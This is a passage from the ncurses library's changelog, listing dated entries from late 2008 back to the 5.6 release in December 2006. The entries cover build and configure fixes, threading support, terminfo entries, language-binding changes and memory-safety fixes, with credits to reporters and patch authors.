	+ fix a missing prototype for ioctl() on OpenBSD in tset.c
	+ add configure option --disable-tic-depends to make explicit whether
	  tic library depends on ncurses/ncursesw library, amends change from
	  20080823 (prompted by Debian #501421).

20081004
	+ some build-fixes for configure --disable-ext-funcs (incomplete, but
	  works for C/C++ parts).
	+ improve configure-check for awks unable to handle large strings, e.g.
	  AIX 5.1 whose awk silently gives up on large printf's.

20080927
	+ fix build for --with-dmalloc by workaround for redefinition of
	  strndup between string.h and dmalloc.h
	+ fix build for --disable-sigwinch
	+ add environment variable NCURSES_GPM_TERMS to allow override to use
	  GPM on terminals other than "linux", etc.
	+ disable GPM mouse support when $TERM does not happen to contain
	  "linux", since Gpm_Open() no longer limits its assertion to terminals
	  that it might handle, e.g., within "screen" in xterm.
	+ reset mouse file-descriptor when unloading GPM library (report by
	  Miroslav Lichvar).
	+ fix build for --disable-leaks --enable-widec --with-termlib
	> patch by Juergen Pfeifer:
	+ use improved initialization for soft-label keys in Ada95 sample code.
	+ discard internal symbol _nc_slk_format (unused since 20080112).
	+ move call of slk_paint_info() from _nc_slk_initialize() to
	  slk_intern_refresh(), improving initialization.

20080925
	+ fix bug in mouse code for GPM from 20080920 changes (reported in
	  Debian #500103, also Miroslav Lichvar).

20080920
	+ fix shared-library rules for cygwin with tic- and tinfo-libraries.
	+ fix a memory leak when failure to connect to GPM.
	+ correct check for notimeout() in wgetch() (report on linux.redhat
	  newsgroup by FurtiveBertie).
	+ add an example warning-suppression file for valgrind,
	  misc/ncurses.supp (based on example from Reuben Thomas)

20080913
	+ change shared-library configuration for OpenBSD, make rpath work.
	+ build-fixes for using libutf8, e.g., on OpenBSD 3.7

20080907
	+ corrected fix for --enable-weak-symbols (report by Frederic L W
	  Meunier).

20080906
	+ corrected gcc options for building shared libraries on IRIX64.
	+ add configure check for awk programs unable to handle big-strings,
	  use that to improve the default for --enable-big-strings option.
	+ makefile-fixes for --enable-weak-symbols (report by Frederic L W
	  Meunier).
	+ update test/configure script.
	+ adapt ifdef's from library to make test/view.c build when mbrtowc()
	  is unavailable, e.g., with HPUX 10.20.
	+ add configure check for wcsrtombs, mbsrtowcs, which are used in
	  test/ncurses.c, and use wcstombs, mbstowcs instead if available,
	  fixing build of ncursesw for HPUX 11.00

20080830
	+ fixes to make Ada95 demo_panels() example work.
	+ modify Ada95 'rain' test program to accept keyboard commands like the
	  C-version.
	+ modify BeOS-specific ifdef's to build on Haiku (patch by Scott
	  Mccreary).
	+ add configure-check to see if the std namespace is legal for cerr
	  and endl, to fix a build issue with Tru64.
	+ consistently use NCURSES_BOOL in lib_gen.c
	+ filter #line's from lib_gen.c
	+ change delimiter in MKlib_gen.sh from '%' to '@', to avoid
	  substitution by IBM xlc to '#' as part of its extensions to digraphs.
	+ update config.guess, config.sub from
	  (caveat - its maintainer removed support for older Linux systems).

20080823
	+ modify configure check for pthread library to work with OSF/1 5.1,
	  which uses #define's to associate its header and library.
	+ use pthread_mutexattr_init() for initializing pthread_mutexattr_t,
	  makes threaded code work on HPUX 11.23
	+ fix a bug in demo_menus in freeing menus (cf: 20080804).
	+ modify configure script for the case where tic library is used (and
	  possibly renamed) to remove its dependency upon ncurses/ncursesw
	  library (patch by Dr Werner Fink).
	+ correct manpage for menu_fore() which gave wrong default for
	  the attribute used to display a selected entry (report by Mike Gran).
	+ add Eterm-256color, Eterm-88color and rxvt-88color (prompted by
	  Debian #495815) -TD

20080816
	+ add configure option --enable-weak-symbols to turn on new feature.
	+ add configure-check for availability of weak symbols.
	+ modify linkage with pthread library to use weak symbols so that
	  applications not linked to that library will not use the mutexes,
	  etc.  This relies on gcc, and may be platform-specific (patch by Dr
	  Werner Fink).
	+ add note to INSTALL to document limitation of renaming of tic library
	  using the --with-ticlib configure option (report by Dr Werner Fink).
	+ document (in manpage) why tputs does not detect I/O errors (prompted
	  by comments by Samuel Thibault).
	+ fix remaining warnings from Klocwork report.

20080804
	+ modify _nc_panelhook() data to account for a permanent memory leak.
	+ fix memory leaks in test/demo_menus
	+ fix most warnings from Klocwork tool (report by Larry Zhou).
	+ modify configure script CF_XOPEN_SOURCE macro to add case for
	  "dragonfly" from xterm #236 changes.
	+ modify configure script --with-hashed-db to let $LIBS override the
	  search for the db library (prompted by report by Samson Pierre).

20080726
	+ build-fixes for gcc 4.3.1 (changes to gnat "warnings", and C inlining
	  thresholds).

20080713
	+ build-fix (reports by Christian Ebert, Funda Wang).

20080712
	+ compiler-warning fixes for Solaris.

20080705
	+ use NCURSES_MOUSE_MASK() in definition of BUTTON_RELEASE(), etc., to
	  make those work properly with the "--enable-ext-mouse" configuration
	  (cf: 20050205).
	+ improve documentation of build-cc options in INSTALL.
	+ work-around a bug in gcc 4.2.4 on AIX, which does not pass the
	  -static/-dynamic flags properly to linker, causing test/bs to
	  not link.

20080628
	+ correct some ifdef's needed for the broken-linker configuration.
	+ make debugging library's $BAUDRATE feature work for termcap
	  interface.
	+ make $NCURSES_NO_PADDING feature work for termcap interface (prompted
	  by comment on FreeBSD mailing list).
	+ add screen.mlterm terminfo entry -TD
	+ improve mlterm and mlterm+pcfkeys terminfo entries -TD

20080621
	+ regenerated html documentation.
	+ expand manpage description of parameters for form_driver() and
	  menu_driver() (prompted by discussion with Adam Spragg).
	+ add null-pointer checks for cur_term in baudrate() and
	  def_shell_mode(), def_prog_mode()
	+ fix some memory leaks in delscreen() and wide acs.

20080614
	+ modify test/ditto.c to illustrate multi-threaded use_screen().
	+ change CC_SHARED_OPTS from -KPIC to -xcode=pic32 for Solaris.
	+ add "-shared" option to MK_SHARED_LIB for gcc on Solaris (report
	  by Poor Yorick).

20080607
	+ finish changes to wgetch(), making it switch as needed to the
	  window's actual screen when calling wrefresh() and wgetnstr().  That
	  allows wgetch() to get used concurrently in different threads with
	  some minor restrictions, e.g., the application should not delete a
	  window which is being used in a wgetch().
	+ simplify mutex's, combining the window- and screen-mutex's.

20080531
	+ modify wgetch() to use the screen which corresponds to its window
	  parameter rather than relying on SP; some dependent functions still
	  use SP internally.
	+ factor out most use of SP in lib_mouse.c, using parameter.
	+ add internal _nc_keyname(), replacing keyname() to associate with a
	  particular SCREEN rather than the global SP.
	+ add internal _nc_unctrl(), replacing unctrl() to associate with a
	  particular SCREEN rather than the global SP.
	+ add internal _nc_tracemouse(), replacing _tracemouse() to eliminate
	  its associated global buffer _nc_globals.tracemse_buf now in SCREEN.
	+ add internal _nc_tracechar(), replacing _tracechar() to use SCREEN in
	  preference to the global _nc_globals.tracechr_buf buffer.

20080524
	+ modify _nc_keypad() to make it switch temporarily as needed to the
	  screen which must be updated.
	+ wrap cur_term variable to help make _nc_keymap() thread-safe, and
	  always set the screen's copy of this variable in set_curterm().
	+ restore curs_set() state after endwin()/refresh() (report/patch
	  Miroslav Lichvar)

20080517
	+ modify configure script to note that --enable-ext-colors and
	  --enable-ext-mouse are not experimental, but extensions from
	  the ncurses ABI 5.
	+ corrected manpage description of setcchar() (discussion with
	  Emanuele Giaquinta).
	+ fix for adding a non-spacing character at the beginning of a line
	  (report/patch by Miroslav Lichvar).

20080503
	+ modify screen.* terminfo entries using new screen+fkeys to fix
	  overridden keys in screen.rxvt (Debian #478094) -TD
	+ modify internal interfaces to reduce wgetch()'s dependency on the
	  global SP.
	+ simplify some loops with macros each_screen(), each_window() and
	  each_ripoff().

20080426
	+ continue modifying test/ditto.c toward making it demonstrate
	  multithreaded use_screen(), using fifos to pass data between screens.
	+ fix typo in form.3x (report by Mike Gran).

20080419
	+ add screen.rxvt terminfo entry -TD
	+ modify tic -f option to format spaces as \s to prevent them from
	  being lost when that is read back in unformatted strings.
	+ improve test/ditto.c, using a "talk"-style layout.

20080412
	+ change test/ditto.c to use openpty() and xterm.
	+ add locks for copywin(), dupwin(), overlap(), overlay() on their
	  window parameters.
	+ add locks for initscr() and newterm() on updates to the SCREEN
	  pointer.
	+ finish table in curs_thread.3x manpage.

20080405
	+ begin table in curs_thread.3x manpage describing the scope of data
	  used by each function (or symbol) for threading analysis.
	+ add null-pointer checks to setsyx() and getsyx() (prompted by
	  discussion by Martin v. Lowis and Jeroen Ruigrok van der Werven on
	  python-dev mailing list).

20080329
	+ add null-pointer checks in set_term() and delscreen().
	+ move _nc_windows into _nc_globals, since windows can be pads, which
	  are not associated with a particular screen.
	+ change use_screen() to pass the SCREEN* parameter rather than
	  stdscr to the callback function.
	+ force libtool to use tag for 'CC' in case it does not detect this,
	  e.g., on aix when using CC=powerpc-ibm-aix5.3.0.0-gcc
	  (report/patch by Michael Haubenwallner).
	+ override OBJEXT to "lo" when building with libtool, to work on
	  platforms such as AIX where libtool may use a different suffix for
	  the object files than ".o" (report/patch by Michael Haubenwallner).
	+ add configure --with-pthread option, for building with the POSIX
	  thread library.

20080322
	+ fill in extended-color pair in two more places, wbkgrndset() and
	  waddch_nosync() (prompted by Sedeno's patch).
	+ fill in extended-color pair in _nc_build_wch() to make colors work
	  for wide-characters using extended-colors (patch by Alejandro R
	  Sedeno).
	+ add x/X toggles to ncurses.c C color test to demo
	  wide-characters with extended-colors.
	+ add a/A toggles to ncurses.c c/C color tests.
	+ modify test/ditto.c to use use_screen().
	+ finish modifying test/rain.c to demonstrate threads.

20080308
	+ start modifying test/rain.c for threading demo.
	+ modify test/ncurses.c to make 'f' test accept the f/F/b/B/</> toggles
	  that the 'F' accepts.
	+ modify test/worm.c to show trail in reverse-video when other threads
	  are working concurrently.
	+ fix a deadlock from improper nesting of mutexes for windowlist and
	  window.

20080301
	+ fixes from 20080223 resolved issue with mutexes; change to use
	  recursive mutexes to fix memory leak in delwin() as called from
	  _nc_free_and_exit().

20080223
	+ fix a size-difference in _nc_globals which caused hanging of mutex
	  lock/unlock when termlib was built separately.

20080216
	+ avoid using nanosleep() in threaded configuration since that often
	  is implemented to suspend the entire process.

20080209
	+ update test programs to build/work with various UNIX curses for
	  comparisons.  This was to reinvestigate statement in X/Open curses
	  that insnstr and winsnstr perform wrapping.  None of the Unix-branded
	  implementations do this, as noted in manpage (cf: 20040228).

20080203
	+ modify _nc_setupscreen() to set the legacy-coding value the same
	  for both narrow/wide models.  It had been set only for wide model,
	  but is needed to make unctrl() work with locale in the narrow model.
	+ improve waddch() and winsch() handling of EILSEQ from mbrtowc() by
	  using unctrl() to display illegal bytes rather than trying to append
	  further bytes to make up a valid sequence (reported by Andrey A
	  Chernov).
	+ modify unctrl() to check codes in 128-255 range versus isprint().
	  If they are not printable, and locale was set, use a "M-" or "~"
	  sequence.

20080126
	+ improve threading in test/worm.c (wrap refresh calls, and KEY_RESIZE
	  handling).  Now it hangs in napms(), no matter whether nanosleep()
	  or poll() or select() are used on Linux.

20080119
	+ fixes to build with --disable-ext-funcs
	+ add manpage for use_window and use_screen.
	+ add set_tabsize() and set_escdelay() functions.

20080112
	+ remove recursive-mutex definitions, finish threading demo for worm.c
	+ remove a redundant adjustment of lines in resizeterm.c's
	  adjust_window() which caused occasional misadjustment of stdscr when
	  softkeys were used.

20080105
	+ several improvements to terminfo entries based on xterm #230 -TD
	+ modify MKlib_gen.sh to handle keyname/key_name prototypes, so the
	  "link_test" builds properly.
	+ fix for toe command-line options -u/-U to ensure filename is given.
+ fix allocation-size for command-line parsing in infocmp from 20070728
  (report by Miroslav Lichvar)
+ improve resizeterm() by moving ripped-off lines, and repainting the
  soft-keys (report by Katarina Machalkova)
+ add clarification in wclear's manpage noting that the screen will be
  cleared even if a subwindow is cleared (prompted by Christer Enfors
  question).
+ change test/ncurses.c soft-key tests to work with KEY_RESIZE.

20071222
+ continue implementing support for threading demo by adding mutex
  for delwin().

20071215
+ add several functions to C++ binding which wrap C functions that
  pass a WINDOW* parameter (request by Chris Lee).

20071201
+ add note about configure options needed for Berkeley database to the
  INSTALL file.
+ improve checks for version of Berkeley database libraries.
+ amend fix for rpath to not modify LDFLAGS if the platform has no
  applicable transformation (report by Christian Ebert, cf: 20071124).

20071124
+ modify configure option --with-hashed-db to accept a parameter which
  is the install-prefix of a given Berkeley Database (prompted by
  pierre4d2 comments).
+ rewrite wrapper for wcrtomb(), making it work on Solaris.  This is
  used in the form library to determine the length of the buffer needed
  by field_buffer (report by Alfred Fung).
+ remove unneeded window-parameter from C++ binding for wresize (report
  by Chris Lee).

20071117
+ modify the support for filesystems which do not support mixed-case to
  generate 2-character (hexadecimal) codes for the lower-level of the
  filesystem terminfo database (request by Michail Vidiassov).
+ add configure option --enable-mixed-case, to allow overriding the
  configure script's check if the filesystem supports mixed-case
  filenames.
+ add wresize() to C++ binding (request by Chris Lee).
+ define NCURSES_EXT_FUNCS and NCURSES_EXT_COLORS in curses.h to make
  it simpler to tell if the extended functions and/or colors are
  declared.

20071103
+ update memory-leak checks for changes to names.c and codes.c
+ correct acsc strings in h19, z100 (patch by Benjamin C W Sittler).

20071020
+ continue implementing support for threading demo by adding mutex
  for use_window().
+ add mrxvt terminfo entry, add/fix xterm building blocks for modified
  cursor keys -TD
+ compile with FreeBSD "contemporary" TTY interface (patch by
  Rong-En Fan).

20071013
+ modify makefile rules to allow clear, tput and tset to be built
  without libtic.  The other programs (infocmp, tic and toe) rely on
  that library.
+ add/modify null-pointer checks in several functions for SP and/or
  the WINDOW* parameter (report by Thorben Krueger).
+ fixes for field_buffer() in formw library (see Redhat #310071,
  patches by Miroslav Lichvar).
+ improve performance of NCURSES_CHAR_EQ code (patch by Miroslav
  Lichvar).
+ update/improve mlterm and rxvt terminfo entries, e.g., for
  the modified cursor- and keypad-keys -TD

20071006
+ add code to curses.priv.h ifdef'd with NCURSES_CHAR_EQ, which
  changes the CharEq() macro to an inline function to allow comparing
  cchar_t struct's without comparing gaps in a possibly unpacked
  memory layout (report by Miroslav Lichvar).

20070929
+ add new functions to lib_trace.c to setup mutex's for the _tracef()
  calls within the ncurses library.
+ for the reentrant model, move _nc_tputs_trace and _nc_outchars into
  the SCREEN.
+ start modifying test/worm.c to provide threading demo (incomplete).
+ separated ifdef's for some BSD-related symbols in tset.c, to make
  it compile on LynxOS (report by Greg Gemmer).

20070915
+ modify Ada95/gen/Makefile to use shlib script, to simplify building
  shared-library configuration on platforms lacking rpath support.
+ build-fix for Ada95/src/Makefile to reflect changed dependency for
  the terminal-interface-curses-aux.adb file which is now generated.
+ restructuring test/worm.c, for use_window() example.

20070908
+ add use_window() and use_screen() functions, to develop into support
  for threaded library (incomplete).
+ fix typos in man/curs_opaque.3x which kept the install script from
  creating symbolic links to two aliases created in 20070818 (report by
  Rong-En Fan).

20070901
+ remove a spurious newline from output of html.m4, which caused links
  for Ada95 html to be incorrect for the files generated using m4.
+ start investigating mutex's for SCREEN manipulation (incomplete).
+ minor cleanup of codes.c/names.c for --enable-const
+ expand/revise "Routine and Argument Names" section of ncurses manpage
  to address report by David Givens in newsgroup discussion.
+ fix interaction between --without-progs/--with-termcap configure
  options (report by Michail Vidiassov).
+ fix typo in "--disable-relink" option (report by Michail Vidiassov).

20070825
+ fix a sign-extension bug in infocmp's repair_acsc() function
  (cf: 971004).
+ fix old configure script bug which prevented "--disable-warnings"
  option from working (patch by Mike Frysinger).

20070818
+ add 9term terminal description (request by Juhapekka Tolvanen) -TD
+ modify comp_hash.c's string output to avoid misinterpreting a null
  "\0" followed by a digit.
+ modify MKnames.awk and MKcodes.awk to support big-strings.
  This only applies to the cases (broken linker, reentrant) where
  the corresponding arrays are accessed via wrapper functions.
+ split MKnames.awk into two scripts, eliminating the shell redirection
  which complicated the make process and also the bogus timestamp file
  which was introduced to fix "make -j".
+ add test/test_opaque.c, test/test_arrays.c
+ add wgetscrreg() and wgetparent() for applications that may need it
  when NCURSES_OPAQUE is defined (prompted by Bryan Christ).

20070812
+ amend treatment of infocmp "-r" option to retain the 1023-byte limit
  unless "-T" is given (cf: 981017).
+ modify comp_captab.c generation to use big-strings.
+ make _nc_capalias_table and _nc_infoalias_table private accessed via
  _nc_get_alias_table() since the tables are used only within the tic
  library.
+ modify configure script to skip Intel compiler in CF_C_INLINE.
+ make _nc_info_hash_table and _nc_cap_hash_table private accessed via
  _nc_get_hash_table() since the tables are used only within the tic
  library.

20070728
+ make _nc_capalias_table and _nc_infoalias_table private, accessed via
  _nc_get_alias_table() since they are used only by parse_entry.c
+ make _nc_key_names private since it is used only by lib_keyname.c
+ add --disable-big-strings configure option to control whether
  unctrl.c is generated using the big-string optimization - which may
  use strings longer than supported by a given compiler.
+ reduce relocation tables for tic, infocmp by changing type of
  internal hash tables to short, and make those private symbols.
+ eliminate large fixed arrays from progs/infocmp.c

20070721
+ change winnstr() to stop at the end of the line (cf: 970315).
+ add test/test_get_wstr.c
+ add test/test_getstr.c
+ add test/test_inwstr.c
+ add test/test_instr.c

20070716
+ restore a call to obtain screen-size in _nc_setupterm(), which
  is used in tput and other non-screen applications via setupterm()
  (Debian #433357, reported by Florent Bayle, Christian Ohm,
  cf: 20070310).

20070714
+ add test/savescreen.c test-program
+ add check to trace-file open, if the given name is a directory, add
  ".log" to the name and try again.
+ add konsole-256color entry -TD
+ add extra gcc warning options from xterm.
+ minor fixes for ncurses/hashmap test-program.
+ modify configure script to quiet c++ build with libtool when the
  --disable-echo option is used.
+ modify configure script to disable ada95 if libtool is selected,
  writing a warning message (addresses FreeBSD ports/114493).
+ update config.guess, config.sub

20070707
+ add continuous-move "M" to demo_panels to help test refresh changes.
+ improve fix for refresh of window on top of multi-column characters,
  taking into account some split characters on left/right window
  boundaries.

20070630
+ add "widec" row to _tracedump() output to help diagnose remaining
  problems with multi-column characters.
+ partial fix for refresh of window on top of multi-column characters
  which are partly overwritten (report by Sadrul H Chowdhury).
+ ignore A_CHARTEXT bits in vidattr() and vid_attr(), in case
  multi-column extension bits are passed there.
+ add setlocale() call to demo_panels.c, needed for wide-characters.
+ add some output flags to _nc_trace_ttymode to help diagnose a bug
  report by Larry Virden, i.e., ONLCR, OCRNL, ONOCR and ONLRET.

20070623
+ add test/demo_panels.c
+ implement opaque version of setsyx() and getsyx().

20070612
+ corrected xterm+pcf2 terminfo modifiers for F1-F4, to match xterm
  #226 -TD
+ split-out key_name() from MKkeyname.awk since it now depends upon
  wunctrl() which is not in libtinfo (report by Rong-En Fan).

20070609
+ add test/key_name.c
+ add stdscr cases to test/inchs.c and test/inch_wide.c
+ update test/configure
+ correct formatting of DEL (0x7f) in _nc_vischar().
+ null-terminate result of wunctrl().
+ add null-pointer check in key_name() (report by Andreas Krennmair,
  cf: 20020901).

20070602
+ adapt mouse-handling code from menu library in form-library
  (discussion with Clive Nicolson).
+ add a modification of test/dots.c, i.e., test/dots_mvcur.c to
  illustrate how to use mvcur().
+ modify wide-character flavor of SetAttr() to preserve the
  WidecExt() value stored in the .attr field, e.g., in case it
  is overwritten by chgat (report by Aleksi Torhamo).
+ correct buffer-size for _nc_viswbuf2n() (report by Aleksi Torhamo).
+ build-fixes for Solaris 2.6 and 2.7 (patch by Peter O'Gorman).

20070526
+ modify keyname() to use "^X" form only if meta() has been called, or
  if keyname() is called without initializing curses, e.g., via
  initscr() or newterm() (prompted by LinuxBase #1604).
+ document some portability issues in man/curs_util.3x
+ add a shadow copy of TTY buffer to _nc_prescreen to fix applications
  broken by moving that data into SCREEN (cf: 20061230).

20070512
+ add 'O' (wide-character panel test) in ncurses.c to demonstrate a
  problem reported by Sadrul H Chowdhury with repainting parts of
  a fullwidth cell.
+ modify slk_init() so that if there are preceding calls to
  ripoffline(), those affect the available lines for soft-keys (adapted
  from patch by Clive Nicolson).
+ document some portability issues in man/curs_getyx.3x

20070505
+ fix a bug in Ada95/samples/ncurses which caused a variable to
  become uninitialized in the "b" test.
+ fix Ada95/gen/Makefile.in adahtml rule to account for recent
  movement of files, fix a few incorrect manpage references in the
  generated html.
+ add Ada95 binding to _nc_freeall() as Curses_Free_All to help with
  memory-checking.
+ correct some functions in Ada95 binding which were using return value
  from C where none was returned: idcok(), immedok() and wtimeout().
+ amend recent changes for Ada95 binding to make it build with
  Cygwin's linker, e.g., with configure options
  --enable-broken-linker --with-ticlib

20070428
+ add a configure check for gcc's options for inlining, use that to
  quiet a warning message where gcc's default behavior changed from
  3.x to 4.x.
+ improve warning message when checking if GPM is linked to curses
  library by not warning if its use of "wgetch" is via a weak symbol.
+ add loader options when building with static libraries to ensure that
  an installed shared library for ncurses does not conflict.  This is
  reported as problem with Tru64, but could affect other platforms
  (report Martin Mokrejs, analysis by Tim Mooney).
+ fix build on cygwin after recent ticlib/termlib changes, i.e.,
  + adjust TINFO_SUFFIX value to work with cygwin's dll naming
  + revert a change from 20070303 which commented out dependency of
    SHLIB_LIST in form/menu/panel/c++ libraries.
+ fix initialization of ripoff stack pointer (cf: 20070421).

20070421
+ move most static variables into structures _nc_globals and
  _nc_prescreen, to simplify storage.
+ add/use configure script macro CF_SIG_ATOMIC_T, use the corresponding
  type for data manipulated by signal handlers (prompted by comments
  in mailing.openbsd.bugs newsgroup).
+ modify CF_WITH_LIBTOOL to allow one to pass options such as -static
  to the libtool create- and link-operations.

20070414
+ fix whitespace in curs_opaque.3x which caused a spurious ';' in
  the installed aliases (report by Peter Santoro).
+ fix configure script to not try to generate adacurses-config when
  Ada95 tree is not built.

20070407
+ add man/curs_legacy.3x, man/curs_opaque.3x
+ fix acs_map binding for Ada95 when --enable-reentrant is used.
+ add adacurses-config to the Ada95 install, based on version from
  FreeBSD port, in turn by Juergen Pfeifer in 2000 (prompted by
  comment on comp.lang.ada newsgroup).
+ fix includes in c++ binding to build with Intel compiler
  (cf: 20061209).
+ update install rule in Ada95 to use mkdirs.sh
> other fixes prompted by inspection for Coverity report:
+ modify ifdef's for c++ binding to use try/catch/throw statements
+ add a null-pointer check in tack/ansi.c request_cfss()
+ fix a memory leak in ncurses/base/wresize.c
+ corrected check for valid memu/meml capabilities in
  progs/dump_entry.c when handling V_HPUX case.
> fixes based on Coverity report:
+ remove dead code in test/bs.c
+ remove dead code in test/demo_defkey.c
+ remove an unused assignment in progs/infocmp.c
+ fix a limit check in tack/ansi.c tools_charset()
+ fix tack/ansi.c tools_status() to perform the VT320/VT420
  tests in request_cfss().  The function had exited too soon.
+ fix a memory leak in tic.c's make_namelist()
+ fix a couple of places in tack/output.c which did not check for EOF.
+ fix a loop-condition in test/bs.c
+ add index checks in lib_color.c for color palettes
+ add index checks in progs/dump_entry.c for version_filter() handling
  of V_BSD case.
+ fix a possible null-pointer dereference in copywin()
+ fix a possible null-pointer dereference in waddchnstr()
+ add a null-pointer check in _nc_expand_try()
+ add a null-pointer check in tic.c's make_namelist()
+ add a null-pointer check in _nc_expand_try()
+ add null-pointer checks in test/cardfile.c
+ fix a double-free in ncurses/tinfo/trim_sgr0.c
+ fix a double-free in ncurses/base/wresize.c
+ add try/catch block to c++/cursesmain.cc

20070331
+ modify Ada95 binding to build with --enable-reentrant by wrapping
  global variables (bug: acs_map does not yet work).
+ modify Ada95 binding to use the new access-functions, allowing it
  to build/run when NCURSES_OPAQUE is set.
+ add access-functions and macros to return properties of the WINDOW
  structure, e.g., when NCURSES_OPAQUE is set.
+ improved install-sh's quoting.
+ use mkdirs.sh rather than mkinstalldirs, e.g., to use fixes from
  other programs.

20070324
+ eliminate part of the direct use of WINDOW data from Ada95 interface.
+ fix substitutions for termlib filename to make configure option
  --enable-reentrant work with --with-termlib.
+ change a constructor for NCursesWindow to allow compiling with
  NCURSES_OPAQUE set, since we cannot pass a reference to
  an opaque pointer.

20070317
+ ignore --with-chtype=unsigned since unsigned is always added to
  the type in curses.h; do the same for --with-mmask-t.
+ change warning regarding --enable-ext-colors and wide-character
  in the configure script to an error.
+ tweak error message in CF_WITH_LIBTOOL to distinguish other programs
  such as Darwin's libtool program (report by Michail Vidiassov)
+ modify edit_man.sh to allow for multiple substitutions per line.
+ set locale in misc/ncurses-config.in since it uses a range
+ change permissions libncurses++.a install (report by Michail
  Vidiassov).
+ corrected length of temporary buffer in wide-character version
  of set_field_buffer() (related to report by Bryan Christ).

20070311
+ fix mk-1st.awk script install_shlib() function, broken in 20070224
  changes for cygwin (report by Michail Vidiassov).

20070310
+ increase size of array in _nc_visbuf2n() to make "tic -v" work
  properly in its similar_sgr() function (report/analysis by Peter
  Santoro).
+ add --enable-reentrant configure option for ongoing changes to
  implement a reentrant version of ncurses:
  + libraries are suffixed with "t"
  + wrap several global variables (curscr, newscr, stdscr, ttytype,
    COLORS, COLOR_PAIRS, COLS, ESCDELAY, LINES and TABSIZE) as
    functions returning values stored in SCREEN or cur_term.
  + move some initialization (LINES, COLS) from lib_setup.c,
    i.e., setupterm() to _nc_setupscreen(), i.e., newterm().

20070303
+ regenerated html documentation.
+ add NCURSES_OPAQUE symbol to curses.h, will use to make structs
  opaque in selected configurations.
+ move the chunk in lib_acs.c which resets acs capabilities when
  running on a terminal whose locale interferes with those into
  _nc_setupscreen(), so the libtinfo/libtinfow files can be made
  identical (requested by Miroslav Lichvar).
+ do not use configure variable SHLIB_LIBS for building libraries
  outside the ncurses directory, since that symbol is customized
  only for that directory, and using it introduces an unneeded
  dependency on libdl (requested by Miroslav Lichvar).
+ modify mk-1st.awk so the generated makefile rules for linking or
  installing shared libraries do not first remove the library, in
  case it is in use, e.g., libncurses.so by /bin/sh (report by Jeff
  Chua).
+ revised section "Using NCURSES under XTERM" in ncurses-intro.html
  (prompted by newsgroup comment by Nick Guenther).

20070224
+ change internal return codes of _nc_wgetch() to check for cases
  where KEY_CODE_YES should be returned, e.g., if a KEY_RESIZE was
  ungetch'd, and read by wget_wch().
+ fix static-library build broken in 20070217 changes to remove "-ldl"
  (report by Miroslav Lichvar).
+ change makefile/scripts for cygwin to allow building termlib.
+ use Form_Hook in manpages to match form.h
+ use Menu_Hook in manpages, as well as a few places in menu.h
+ correct form- and menu-manpages to use specific Field_Options,
  Menu_Options and Item_Options types.
+ correct prototype for _tracechar() in manpage (cf: 20011229).
+ correct prototype for wunctrl() in manpage.

20070217
+ fixes for $(TICS_LIST) in ncurses/Makefile (report by Miroslav
  Lichvar).
+ modify relinking of shared libraries to apply only when rpath is
  enabled, and add --disable-relink option which can be used to
  disable the feature altogether (reports by Michail Vidiassov,
  Adam J Richter).
+ fix --with-termlib option for wide-character configuration, stripping
  the "w" suffix in one place (report by Miroslav Lichvar).
+ remove "-ldl" from some library lists to reduce dependencies in
  programs (report by Miroslav Lichvar).
+ correct description of --enable-signed-char in configure --help
  (report by Michail Vidiassov).
+ add pattern for GNU/kFreeBSD configuration to CF_XOPEN_SOURCE,
  which matches an earlier change to CF_SHARED_OPTS, from xterm #224
  fixes.
+ remove "${DESTDIR}" from -install_name option used for linking
  shared libraries on Darwin (report by Michail Vidiassov).

20070210
+ add test/inchs.c, test/inch_wide.c, to test win_wchnstr().
+ remove libdl from library list for termlib (report by Miroslav
  Lichvar).
+ fix configure.in to allow --without-progs --with-termlib (patch by
  Miroslav Lichvar).
+ modify win_wchnstr() to ensure that only a base cell is returned
  for each multi-column character (prompted by report by Wei Kong
  regarding change in mvwin_wch() cf: 20041023).

20070203
+ modify fix_wchnstr() in form library to strip attributes (and color)
  from the cchar_t array (field cells) read from a field's window.
  Otherwise, when copying the field cells back to the window, the
  associated color overrides the field's background color (report by
  Ricardo Cantu).
+ improve tracing for form library, showing created forms, fields, etc.
+ ignore --enable-rpath configure option if --with-shared was omitted.
+ add _nc_leaks_tinfo(), _nc_free_tic(), _nc_free_tinfo() entrypoints
  to allow leak-checking when both tic- and tinfo-libraries are built.
+ drop CF_CPP_VSCAN_FUNC macro from configure script, since C++ binding
  no longer relies on it.
+ disallow combining configure script options --with-ticlib and
  --enable-termcap (report by Rong-En Fan).
+ remove tack from ncurses tree.

20070128
+ fix typo in configure script that broke --with-termlib option
  (report by Rong-En Fan).

20070127
+ improve fix for FreeBSD gnu/98975, to allow for null pointer passed
  to tgetent() (report by Rong-en Fan).
+ update tack/HISTORY and tack/README to tell how to build it after
  it is removed from the ncurses tree.
+ fix configure check for libtool's version to trim blank lines
  (report by sci-fi@hush.ai).
+ review/eliminate other original-file artifacts in cursesw.cc, making
  its license consistent with ncurses.
+ use ncurses vw_scanw() rather than reading into a fixed buffer in
  the c++ binding for scanw() methods (prompted by report by Nuno Dias).
+ eliminate fixed-buffer vsprintf() calls in c++ binding.

20070120
+ add _nc_leaks_tic() to separate leak-checking of tic library from
  term/ncurses libraries, and thereby eliminate a library dependency.
+ fix test/mk-test.awk to ignore blank lines.
+ correct paths in include/headers, for --srcdir (patch by Miroslav
  Lichvar).

20070113
+ add a break-statement in misc/shlib to ensure that it exits on the
  _first_ matched directory (report by Paul Novak).
+ add tack/configure, which can be used to build tack outside the
  ncurses build-tree.
+ add --with-ticlib option, to build/install the tic-support functions
  in a separate library (suggested by Miroslav Lichvar).

20070106
+ change MKunctrl.awk to reduce relocation table for unctrl.o
+ change MKkeyname.awk to reduce relocation table for keyname.o
  (patch by Miroslav Lichvar).

20061230
+ modify configure check for libtool's version to trim blank lines
  (report by sci-fi@hush.ai).
+ modify some modules to allow them to be reentrant if _REENTRANT is
  defined: lib_baudrate.c, resizeterm.c (local data only)
+ eliminate static data from some modules: add_tries.c, hardscroll.c,
  lib_ttyflags.c, lib_twait.c
+ improve manpage install to add aliases for the transformed program
  names, e.g., from --program-prefix.
+ used linklint to verify links in the HTML documentation, made fixes
  to manpages as needed.
+ fix a typo in curs_mouse.3x (report by William McBrine).
+ fix install-rule for ncurses5-config to make the bin-directory.

20061223
+ modify configure script to omit the tic (terminfo compiler) support
  from ncurses library if --without-progs option is given.
+ modify install rule for ncurses5-config to do this via "install.libs"
+ modify shared-library rules to allow FreeBSD 3.x to use rpath.
+ update config.guess, config.sub

20061217 5.6 release for upload to

20061217
+ add ifdef's for <wctype.h> for HPUX, which has the corresponding
  definitions in <wchar.h>.
+ revert the va_copy() change from 20061202, since it was neither
  correct nor portable.
